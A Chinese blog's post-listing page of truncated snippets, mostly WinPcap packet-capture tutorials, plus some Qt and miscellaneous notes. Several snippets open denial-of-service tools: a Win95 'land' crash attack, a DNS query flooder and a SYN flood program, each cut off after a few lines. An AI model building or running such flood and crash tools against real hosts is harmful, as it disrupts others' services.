- 博客(75)
- 资源 (5)
- 收藏
- 关注
RSS订阅原创 fdfdfgdf
1./*1. ************************************************************************************2. * sniffer_winPcap *3. * Last versio
2012-05-02 23:38:36
477
原创 wqeqwew
代码:/* Code By yunshu, 2008-05-08, Make tcp packet to send to remote server * I don't know which version of winpcap needed by hping, so I wrote this code. * Under winpcap 4.0.2, Dev-CPP 4.9.9.2, wi
2012-05-02 23:26:03
675
原创 space
发现自:http://www.cvchina.info/看到epfl的一种前景检测算法-emvisi2,亮点是可以处理较为剧烈的光照变化。http://cvlab.epfl.ch/software/emvisi2/index.php上不了外网的同学,请看:http://hi3ms.huawei.com/hi/blog/7970_177993.html
2012-04-25 08:48:33
456
原创 gongji
Abstract 这里有一些是老的,现在看来并没有用,但他们都很有名。 1 Land 攻击一台Win95的机器。这是Win95的一个漏洞,以其IP地址和端口向自 己的同一个端口发起连接(发SYN),Win95即会崩溃。 /* land.c by m3lt, FLC crashes a win95 box */ #include #incl
2012-04-24 23:23:39
779
原创 juyuwangsaomiao
#include "packet32.h" #include "ntddndis.h" #include #include #pragma comment(lib,"ws2_32") #pragma comment(lib,"packet") #define ETH_IP 0x0800 #de
2012-04-24 23:21:03
355
原创 juyuwangsaomiao
#include "packet32.h" #include "ntddndis.h" #include #include #pragma comment(lib,"ws2_32") #pragma comment(lib,"packet") #define ETH_IP 0x0800 #define ETH_ARP 0x0806 #define ARP_REQUEST 0x0001 #defin
2012-04-24 23:19:46
351
原创 wen
详谈调用winpcap驱动写arp多功能工具创建时间:2002-09-14文章属性:原创文章来源:中华安全网文章提交:TOo2y (too2y_at_safechina.net)详谈调用winpcap驱动写arp多功能工具Author: TOo2y[原创]E-mail: TOo2y@safechina.netHomepage: www.safechi
2012-04-24 08:07:36
350
原创 IP6
*程序3. *程序名:AnalyzeIPv6_WinPcap.cpp *本程序通过使用WinPcap来捕获IPv6数据包,并解析IPv6数据包头(包括IPv6数据包中的TCP,UDP,ICMPv6数据包) */#include "iostream"#include "stdlib.h"#include "stdio.h"#include "pcap.h"#incl
2012-04-24 07:53:26
631
原创 yitaiwang
* *程序1. *程序名:AnalyzeETH_WinPcap.cpp *本程序通过使用WinPcap来捕获以太帧包,并解析以太帧头 */#include #include #include #include #include #pragma comment(lib,"ws2_32")#pragma comment(lib,"wpcap"
2012-04-24 07:52:39
380
原创 feizusechizhubao
#include "pcap.h"#include "remote-ext.h"INT getAdaper(int &i,pcap_if_t *&alldevs,pcap_t *&adhandle,char *&errbuf,pcap_if_t *&d){ int inum = 0; printf("Enter the interface number (1-%d):",i
2012-04-24 07:42:29
244
原创 dumpfile
#if !defined(AFX_DUMP2FILE_H__D352EAE8_5825_4DF7_8766_4053FFD0018C__INCLUDED_)#define AFX_DUMP2FILE_H__D352EAE8_5825_4DF7_8766_4053FFD0018C__INCLUDED_#if _MSC_VER > 1000#pragma once#endif //
2012-04-24 07:39:12
458
原创 udpcap
#include "pcap.h"#pragma comment(lib, "wpcap.lib")#pragma comment(lib, "Packet.lib")#pragma comment(lib, "wsock32.lib")/* 4 bytes IP address */typedef struct ip_address{u_char byte1;u_char byte2;u_cha
2012-04-24 07:36:43
303
原创 pocket
#pragma pack(1) typedef struct mac_address{ u_char byte1; u_char byte2; u_char byte3; u_char byte4; u_char byte5; u_char byte6; }mac_address; typedef struc
2012-04-24 07:32:25
381
原创 http://www.codesoso.net/Search?q=winpcap++%B9%A5%BB%F7&l=c
http://www.codesoso.net/Search?q=winpcap++%B9%A5%BB%F7&l=c
2012-04-24 00:07:19
2559
原创 dos
/*********************向指定IP发送a.a.a到z.z.z的dns查询包,来达到攻击dns服务器的目的运行格式 ./dos dns服务器ip*********************/#include>#include"stdio.h"#include"sys/types.h"#include"string.h"#include"sys/socket.h"#include"u
2012-04-24 00:05:11
390
原创 synflood
#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum,maxthread,port;char *DestIP;//目标IPvoid display(void) // 定义状态提示函数 { static int play=0;// 进度条 char *plays[
2012-04-24 00:02:14
381
原创 // Server.cpp : Defines the entry point for the application.
// Server.cpp : Defines the entry point for the application. // #include "stdafx.h" #include #include #include #include #include #include #include #include
2012-04-23 23:56:45
936
原创 WinPcap 数据结构
WinPcap 数据结构以下是数据结构及其简要的说明:__CPU_Private_Data每个CPU的核心缓存_DEVICE_EXTENSION端口设备扩展_INTERNAL_REQUEST保存一个对象标识(OID)请求_OPEN_INSTANCE包含一个运行着的NPF驱动实例的_PACKET_RESERVED
2012-04-23 23:44:10
608
原创 远程捕获
远程捕获 模块 输出结构与定义 输出函数 内部函数 内部结构与定义详细描述远程捕获运行模式配置远程程序(rpcapd)在远程机器上启动捕获在Unix机器上安装远程捕获程序WinPcap拥有远程捕获的能力。这个高级特性能够捕获在远程网络上传输
2012-04-23 23:42:43
1651
原创 使用WinPcap编程
使用WinPcap编程[WinPcap用户指南] 创建一个使用 wpcap.dll 的应用程序用 Microsoft Visual C++ 创建一个使用 wpcap.dll 的应用程序,需要按一下步骤: 在每一个使用了库的源程序中,将 pcap.h 头文件包含(include)进来。 如果你在程序中使用了WinPcap中提供给Win32平台的特有
2012-04-23 23:41:51
437
原创 Packet.dll -- 数据包驱动API
Packet.dll -- 数据包驱动API[WinPcap核心资料] Packet.dll 是一个动态链接库,并提供了一些低层的函数,用来:安装,启动和停止NPF设备驱动 从NPF驱动接收数据包 通过NPF驱动发送数据包 获取可用的网络适配器列表 获取适配器的不同信息,比如设备描述,地址列表和掩码 查询并设置一个低层的适配器参数 packet.
2012-04-23 23:40:38
924
原创 如何编译WinPcap
如何编译WinPcap[WinPcap核心资料] 这部分内容将告诉你,在不同的win32平台上,如何编译WinPcap。源代码可以在WinPcap 网站上获得。编译驱动编译NPF时,有两个主要的路径:Windows NTx和Windows 9x。注意,因为NPF驱动是与平台相关的,所以,为了连接正确的DDK库,我们强烈建议编译的时候,要选择将来会被使
2012-04-23 23:39:51
580
原创 NPF 函数
NPF 函数[WinPcap核心资料] 函数NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) The initialization routine of the driver. PWC
2012-04-23 23:39:00
1054
原创 NPF驱动核心指南
NPF驱动核心指南[WinPcap核心资料] 模块 NPF 结构与定义 NPF 函数数据结构struct binary_stream A stream of X86 binary code. More...struct JIT_BPF_Filter
2012-04-23 23:37:12
936
原创 WinPcap核心资料
WinPcap核心资料 模块 NPF驱动核心指南 如何编译WinPcap Packet.dll -- 数据包驱动API详细描述这部分指南从最底层的模块开始,描述了WinPcap的核心结构与接口。这部分内容的适合那些想要扩展或修改本软件的人,或者是那些对WinPcap的工作原理感兴趣的人。
2012-04-23 23:35:51
547
原创 分析数据包
分析数据包 现在,我们可以捕捉并过滤网络流量了,那就让我们学以致用,来做一个简单使用的程序吧。在本讲中,我们将会利用上一讲的一些代码,来建立一个更实用的程序。 本程序的主要目标是展示如何解析所捕获的数据包的协议首部。这个程序可以称为UDPdump,打印一些网络上传输的UDP数据的信息。我们选择分析和现实UDP协议而不是TCP等其它协议,是因为它比其它的协
2012-04-23 23:35:03
523
原创 过滤数据包
过滤数据包 WinPcap和Libpcap的最强大的特性之一,是拥有过滤数据包的引擎。 它提供了有效的方法去获取网络中的某些数据包,这也是WinPcap捕获机制中的一个组成部分。 用来过滤数据包的函数是pcap_compile() 和 pcap_setfilter() 。pcap_compile() 它将一个高层的布尔过滤表达式编译成一个能够被过滤引
2012-04-23 23:34:14
567
原创 不用回调方法捕获数据包
不用回调方法捕获数据包 本讲的范例程序所实现的功能和效果和上一讲的非常相似 (打开适配器并捕获数据包), 但本讲将用pcap_next_ex() 函数代替上一讲的 pcap_loop()函数。pcap_loop()函数是基于回调的原理来进行数据捕获,这是一种精妙的方法,并且在某些场合中,它是一种很好的选择。 然而,处理回调有时候并不实用 -- 它会增
2012-04-23 23:31:36
264
原创 打开适配器并捕获数据包
打开适配器并捕获数据包 现在,我们已经知道如何获取适配器的信息了,那我们就开始一项更具意义的工作,打开适配器并捕获数据包。在这讲中,我们会编写一个程序,将每一个通过适配器的数据包打印出来。打开设备的函数是 pcap_open()。下面是参数 snaplen, flags 和 to_ms 的解释说明 snaplen 制定要捕获数据包中的哪些部分。 在一些操
2012-04-23 23:30:52
305
原创 获取设备列表
获取设备列表 通常,编写基于WinPcap应用程序的第一件事情,就是获得已连接的网络适配器列表。libpcap和WinPcap都提供了 pcap_findalldevs_ex() 函数来实现这个功能: 这个函数返回一个 pcap_if 结构的链表, 每个这样的结构都包含了一个适配器的详细信息。值得注意的是,数据域 name 和 description 表示一
2012-04-23 23:29:43
372
原创 使用WinPcap编程
创建一个使用 wpcap.dll 的应用程序用 Microsoft Visual C++ 创建一个使用 wpcap.dll 的应用程序,需要按一下步骤: 在每一个使用了库的源程序中,将 pcap.h 头文件包含(include)进来。 如果你在程序中使用了WinPcap中提供给Win32平台的特有的函数, 记得在预处理中加入WPCAP 的定义。 如果你的程序使用了WinPcap的远程捕
2012-04-23 23:28:10
515
原创 过滤串表达式的语法
主 页模块数据结构文件相关页面过滤串表达式的语法[WinPcap用户指南] 注意:这篇文档取自tcpdump的指南。原始的版本 www.tcpdump.org 找到。 wpcap的过滤器是以已声明的谓词语法为基础的。过滤器是一个ASCII字符串,它包含了一个过滤表达式。pcap_compile()把这个表达式编译成内核级的
2012-04-23 23:25:24
337
原创 识别
http://www.ics.uci.edu/~xzhu/ http://www.tnt.uni-hannover.de/staff/leal/
2012-04-18 09:53:08
177
原创 重要连接
http://www.cnblogs.com/xiaotie/archive/2009/01/15/1376677.htmlerasure code
2012-03-21 17:03:52
157
原创 douzi
Qt学习之路(47): 自定义Model之三2010-01-20 00:40:45标签:QtC++ 学习 教程 QT教程 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://devbean.blog.51cto.com/448512/268468今天来说的是自定义model
2012-03-16 08:05:55
246
原创 douzi
Qt学习之路(48): 自定义委托2010-01-27 20:36:34标签:QtC++ 学习 教程 QT教程 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://devbean.blog.51cto.com/448512/271255好久没有来写文章了,由于家里面宽带断了
2012-03-16 08:03:20
239
原创 Bin2Asc
ULONG Bin2Asc( UCHAR *pucIn, int iInLen, UCHAR *pucOut ){ if ( pucIn == NULL || pucOut == NULL ) { ErrorLog( __FILE__, __LINE__, "Bin2Asc() Parameter NULL." ); return
2012-03-13 11:01:45
447
woowowowowwowo
2012-04-18
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人